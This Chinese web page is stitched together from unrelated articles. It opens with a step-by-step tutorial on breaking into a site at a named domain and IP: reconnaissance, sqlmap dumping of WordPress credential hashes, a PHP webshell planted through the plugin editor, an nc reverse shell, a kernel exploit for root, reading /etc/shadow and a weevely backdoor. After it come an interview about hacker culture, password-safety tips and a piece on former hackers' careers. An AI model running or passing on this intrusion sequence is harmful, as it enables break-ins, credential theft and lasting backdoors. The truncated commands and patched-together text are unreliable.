作者:华盟
一篇科普文,很适合初学者,长文请静下心看。本文将用图文讲解黑客攻破网站全流程。通过本文你将了解黑客常用的入手思路和技术手法,适合热爱 *** 信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。
阅读本文你会学到以下内容:
渗透测试前的简单信息收集。
sqlmap的使用
nmap的使用
nc反弹提权
linux系统的权限提升
backtrack 5中渗透测试工具nikto和w3af的使用等
假设黑客要入侵的你的网站域名为:hack-test.com
让我们用ping命令获取网站服务器的IP地址
现在我们获取了网站服务器的IP地址为:173.236.138.113
寻找同一服务器上的其它网站,我们使用sameip.org.
26 sites hosted on IP Address 173.236.138.113
173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。
我们需要关于你网站的以下信息:
DNS records (A, NS, TXT, MX and SOA)
Web Server Type (Apache, IIS, Tomcat)
Registrar (the company that owns your domain)
s that your site uses (php, asp, asp.net, jsp, cfm)
Your server OS (Unix,Linux,Windows,Solaris)
Your server open ports to internet (80, 443, 21, etc.)
让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.
我们发现你的DNS记录如下
让我们来确定web服务器的类型
发现你的Web服务器是apache,接下来确定它的版本.
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3Month: 3.7
接下来是时候寻找你网站域名的注册信息,你的 *** 、邮箱、地址等.
我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.
我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.
我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:
1-Find services that run on server(查看服务器上运行的服务)
2-Find server OS(查看操作系统版本)
只有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.
我们将使用Nikto来收集漏洞信息:
root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com
我们也会用到Backtrack 5 R1中的W3AF 工具:
root@bt:/pentest/web/w3af#
我们输入要检测的网站地址,选择完整的安全审计选项.
稍等一会,你将会看到扫描结果.
发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.
我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.
Using sqlmap with –u url
过一会你会看到
输入N按回车键继续
我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.
发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名
通过参数“-T wp_users –columns ”来查看wp_users表中的字段.
接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”
我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes
登陆wordpress的后台wp-admin
尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.
Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。
我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.
然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.
点击连接我们会看到
接下来我们尝试执行一些命令:
uid=48(apache) gid=489(apache) groups=489(apache)
(用来显示用户的id和组)
pwd
/var/
(显示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 *** P Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息)
现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.
在服务器上测试了很多exp之后,我们用以下的exp来提升权限.
我们在nc shell上执行以下命令:
-o roro.c
(下载exp到服务器并重命名为roro.c)
注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.
exp roro.c代码如下:
通过以上代码我们发现该exp是C语言开发的,我们需要将他编译成elf格式的,命令如下:
gcc roro.c –ororo
接下来执行编译好的exp
执行完成之后我们输入id命令
我们发现我们已经是root权限了
uid=0(root) gid=0(root)
现在我们可以查看/etc/shadow文件
cat/etc/shadow
我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做,我们需要在这个服务器上留下后门以方便我们在任何时候访问它.
我们用weevely *** 一个php小马上传到服务器上.
1.weevely使用选项
root@bt:/pentest/backdoors/web/weevely# -
2.用weevely创建一个密码为koko的php后门
root@bt:/pentest/backdoors/web/weevely# -g -o hax.php -p koko
接下来上传到服务器之后来使用它
root@bt:/pentest/backdoors/web/weevely# -t - -pkoko
测试我们的hax.php后门
完成,撒花!
整理/夏立城 上海蓝盟创始人兼CEO,复旦校友创新创业俱乐部副会长,致力于用IT外包 *** 维护服务赋能企业客户发展,助力其创新、迭代和进化。
专访广东警官学院公共管理系副主任、珠三角公共安全研究所副所长吴兴民
我混进黑客圈的那三年
十二年前,吴兴民决定去做一件事,至今他仍深受影响。
“直到现在,公众对黑客的了解还是很有限。”吴兴民说,黑客一直被认为是威胁 *** 安全的主要力量,黑客群体是干非法勾当的人、犯罪以及具有颠覆性信仰和活动的大本营。黑客究竟是什么,他们究竟想干什么?大概只有熟悉黑客生活的人才能解答。吴兴民决定进入黑客群体,切实地深入到他们的日常生活中去,对黑客的文化及其日常行为进行描述与解释。
那是2005年,互联网从科研领域进入社会生活尚不足十年。
三年时间
好奇心的萌芽,若没有正确的引导很容易误入歧途。“好奇心转化为功利性很快。”吴兴民说,在他接触的黑客中就有逃课的孩子,“逃课去网吧玩技术,没钱了就用学到的技术破密码、盗号、卖装备,或者在论坛里接点活。”
“当时比较多见的是破解一些国外的网站和游戏,以此牟利。有一批人做(黑产),不多,但已经出现了。”吴兴民说,做黑产的人在论坛里是不受欢迎的,每次出现都会被群起而攻之,进而引起一番是与非的无休止争论,“大部分黑客不认为自己有错,因为他们热爱的是技术本身,这种兴趣可以用"痴迷"来形容,入侵网站是为了检测网站的安全性,技术也抱着非功利目的。”至于黑客技术最后被用来干什么,则是者无力思考的问题。“像那样纯粹抱有理想的黑客,越来越难看到了。”他不免有点感慨。
多年过去了,很多早期的黑客,大多已经就业,过上了正常的生活。
一个问题
如何引导黑客走上正途
吴兴民一直在思考一个问题,如何正确引导那些边缘状态的黑客走向“正途”?
“任何一个群体,都需要有一个价值体系去激励他们,现实生活中,人们常常把黑客理解为反面的状态,他们没有办法得到认可和激励,慢慢地,就可能会通过利益关系来强调他的技术水平高低,甚至是走上犯罪的道路。”吴兴民说,“黑客不是一项职业,他们一开始可能就是贪玩儿、好胜,当然和不良教育有关,但更多的是社会性的问题,不是他们自己能解决的。”
“对于情节严重,触犯法律的,就要按照法律来,《刑法》里有专门的条款,叫"非法侵入计算机信息系统罪",但是使用率不高。”吴兴民说,“大部分黑客的行为,后果不一定严重,在惩罚的同时,应更加注重教育和引导。很不容易,但是,有些事情必须得做!我们也都在做。”
他记得有媒体曾报道,当年被社会和媒体广泛关注的神秘的黑客高手,网上排名之一的“黑客站长”,高二时花三天时间写出了20万字的《黑客攻击防范秘技》并畅销,17岁时就出任三家 *** 公司的CEO,成为中国最年轻的首席执行官,经过计算机专家的知识考核和能力测试,作为特招生进入复旦大学。
“大多数黑客是出于爱好,自学成才。 *** 或其他机构,应该给这些年轻的黑客找一个更好的出路,让他们有一个合理合法的途径去展现自己的技术,这样转变的人,可以为 *** 安全事业多做贡献。”
为什么黑客都不愿被称为“黑客”
黑客(Hacker)曾经是人们对那些具有高超编程技巧,迷恋计算机代码的程序设计人员的称谓。
但很多黑客不再愿意被称为“黑客”,如果一定要,那么在前面加上一个前缀“白帽子”黑客,以作区分。
“过去几年所谓的黑客圈实在是令人发指。”一位黑客说,低龄、野蛮、不计后果,差不多就是现在所谓“黑客”的公众形象,真是说不上光彩。
吴兴民提到了“朽木”(其另一网名为“菜霸”)。这是一个曾经在黑客圈声名赫赫的人物,因为他攻破了腾讯的内部系统,并通过其内部平台找到了公司负责人的手机号码,发短信告诉对方“你们的系统有问题,请和我联系”。那是2006年,“朽木”17岁。尽管事后他声明,攻破系统后并未向任何人提出任何有关钱和物的要求,甚至还告诉了对方如何加强防范。但腾讯依然报了警,后因证据不足,法庭没有正式审理。“朽木”因此成名,但随后淡出了黑客圈。2011年, “朽木”在天涯论坛发了自己在罗布泊的照片,但点击量寥寥。只有圈内的网友留言说,“江湖还有你的传说,而那时,你还只是一个孩子!”去年有网友晒出“朽木”近照,据说在美国生活,衣食无忧,且瘦了很多。
几乎每个黑客都经历过“朽木”那个阶段,何淇丹称之为“黑站的 *** ”——攻破一个系统,只是为了证明我能。刚摸到门槛的黑客,很容易被黑站的 *** 所引导,这事儿,何淇丹干过、刘耕铭干过、朱梦凡也干过。“黑站的 *** 很快就会过去,当我知道我能之后,我想知道为什么我能,更想让别人不能,想更了解计算机本身。”何淇丹说,做一个黑站的黑客只要掌握点黑客工具,每个人都能干,但像他们这种“科班出身”的人接受过计算机系统教育,老干黑站的活儿,那真是太不拿自己当回事儿,“科班出身的,至少得拿计算机科学家的目标激励自己,不过我现在只能算个计算机研究者。”
相比“朽木”,何淇丹他们算是很幸运的,斯诺登事件之后,信息安全越来越受重视,也有越来越多的渠道让对计算机、对信息安全感兴趣的人有正当路径去获得能力认可,比如各种CTF比赛;知名互联网公司公开的漏洞提交平台;各种国内外技术会议……你的能力可以获得足够的尊重,并得到一定的经济回报。比如谷歌对一个安卓系统漏洞的奖金是1万美元,且不论高低,至少干净。
知乎上有这样一个问题:当你的能力处在行业顶端时,是一种什么样的体验?
排名之一的答案来自TK(玄武实验室领头人于旸),学医出身,被黑客圈昵称为“妇科圣手”,他说:“艺无止境,诚惶诚恐。”
(本报记者 詹丽华)
美国一家密码管理应用提供商SplashData 公司近期总结出2012年度最差的25个密码,美国《 *** 》作家尼克尔·佩尔荣斯近日撰文指出,密码要想不被黑客猜中,有几点非常重要的注意事项。以下为文章全文:
从事 *** 安全文章写作不久,我就变成了一个嘲笑从前的自己的偏执狂。每天,黑客们不停地提醒我,窃取我的个人数据太容易了。不到几周时间,我为每家网站的账号设置了独特的、复杂登陆密码,并为自己的电子邮箱账户设置两重认证程序。我甚至给计算机的摄像头贴上了胶带纸——朋友和同事建议我该去看心理医生了。
但是最近的一些事情终于为我洗冤。我撕掉摄像头的胶带,没几天就发现指示灯变绿了。这说明有人入侵我的计算机,正虎视眈眈地监视我。最近,谷歌发来的短信,内含Gmail帐户的第二步验证码。问题是我根本没登陆帐户,干嘛要第二次验证?很明显,黑客试图闯入我的邮箱。
被黑太容易了,你只需要点击一个含有病毒的链接或者附件就中招。大公司的计算机系统每天都遭受黑客的袭击。黑客们将窃取的密码放到黑市上交易,每个可获得20美元的收入。黑客最喜欢用诸如“约翰开膛手”(John the Ripper)之类的免费密码破解程序,它每秒可以尝试数百万次密码登陆。
每个人一生中总会遭受几次黑客入侵。我们唯一能做的就是管理好密码,逃避可疑的链接。不幸的是,良好的密码设置习惯就像牙线剔牙——你知道它的重要性,但需要持之以恒,付出努力。想想看,为每一个新闻网站、社交网站、电子商务网站、银行网站、企业网站和电子邮件帐户想出唯一的、难以破解的密码并把它们全部记 住是件多有挑战的事情啊。
为了解决这个问题,我给耶利米·格罗斯曼(Jeremiah Gros *** an)和保罗·科克(Paul Kocher)打 *** 咨询。格罗斯曼先生是个知名黑客,他之一个公开演示如何通过浏览器控制一台电脑的摄像头和麦克风。目前,格罗斯曼供职一家互联网和 *** 安全公司。科克先生是著名的密码学专家,以巧妙攻击安全系统而闻名。他现在经营一家安全公司,专注于提高系统抵御黑客的能力。以下是他们给出的建议:
不要靠字典中的单词:如果你的密码可以在单词书中找到,那就和没有一样。黑客们经常借助词典以及词汇的变体测试密码。如果你不属于这一类,他们通常就会放弃。
一个密码绝对不要使用两次:人们喜欢在不同的网站使用同一密码,这可让黑客有了可乘之机。如果你的LinkedIn账户遭泄露,可能没什么损失;但他们会利用该密码尝试你的电子邮箱、银行账户等一切存储资产及重要个人数据的地方。
设置密码短语。密码越长,破解的时间也越长。如果不想让黑客在24小时内能破解你的密码,密码长度应该超过14个字符。因为长密码难于记忆,可考虑用喜欢的电影台词、歌词或一首诗的首字母拼接在一起。
胡乱敲击键盘:对于敏感的账户,格罗斯曼先生建议随机乱敲键盘,并间或敲击Shift和Alt键,然后将结果复制到一个文本,存入一个有密码保护的U盘。
安全存储你的密码。不要将密码放在收件箱或桌面。如果恶意软件感染电脑,你就完蛋了。格罗斯曼先生将密码文件存入加密U盘,使用帐户时,他把这些密码复制粘贴过去。即便黑客利用键盘记录软件,同样无法捕捉到他的密码。科克先生则把密码提示保存一张纸上,把敏感的信息和互联网彻底隔离。
不要依赖密码管理器。密码保护软件可使用户将所有用户名和密码存储在同一区域。有些程序还能为你创建强大的密码,只要你输入主密码,就能帮你自动登录网站。 如LastPass、SplashData和AgileBits等等。科克先生认为,即使加密后,密码仍然留在计算机里。如果电脑遭到盗窃,等于丢失所有 密码。而且密码管理器不一定靠谱,今年初在阿姆斯特丹举行的安全会议上,黑客们就演示了破解手机密码管理器的技术。
安全问题更好答非所问。网站的验证问题经常问道“你最喜欢什么颜色?”“你在哪所中学就读?”,这些问题的答案局限性太大,很容易在互联网上找到。今年初, 一名黑客利用米特·罗姆尼(Mitt Romney)最喜欢的宠物的名字破解其Hotmail和Dropbox帐户。比较安全的做法是密码提示和问题无关。如果安全问题问出生医院的名称,你的回答可以是最喜欢的歌词。
使用不同的浏览器。格罗斯曼先生强调,不同的 *** 活动要用不同的浏览器。选择一个浏览器做乱七八糟的事情,如浏览网上论坛、新闻网站、博客等不重要的事情。第二个浏览器用于登录网上银行或收发电子邮件。这样浏览器被攻击后,银行帐户就不一定会泄露。Accuvant Labs去年研究发现,在其所调查的火狐、谷歌Chrome及微软Internet Explorer浏览器中,Chrome最安全。
其实说起黑客,相信大家对于他们并不是一无所知,在普通人眼里他们是在计算机上有着极大天赋的一群人,同时也算是一群特别神秘的人物。他们常常因为超强的计算机技术而名声大噪,从而被人们所认识。那你们是否知道曾经鼎鼎大名的黑客现在又在做什么呢?
1、 *** 安全研究员
这个工作可能是大多数黑客的首选,因为自己曾经的黑客身份,所以对黑客的入侵手段以及攻击手段都是相当的了解,所以从事这个行业,可能是黑客更好的归宿了。比如我们熟悉的凯文-米特尼克,一个曾经黑进北美空中防御指挥部,五角大楼等等机构的男人,最后也成为了 *** 安全研究员。
2、继续隐匿在暗处
选择继续隐匿在暗处做着黑产的人,心中都必然有一个信念或者是不为人知的故事,我们不去评论他人做的对不对,只是立场不同。
3、退出
也许是因为厌倦了互联网,厌倦了黑客行业的明争暗斗以及提心吊胆的生活,所以选择退出,选择做世界的普通人而不是 *** 世界的神。
无论走哪条路,邪路是永远走不通的。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
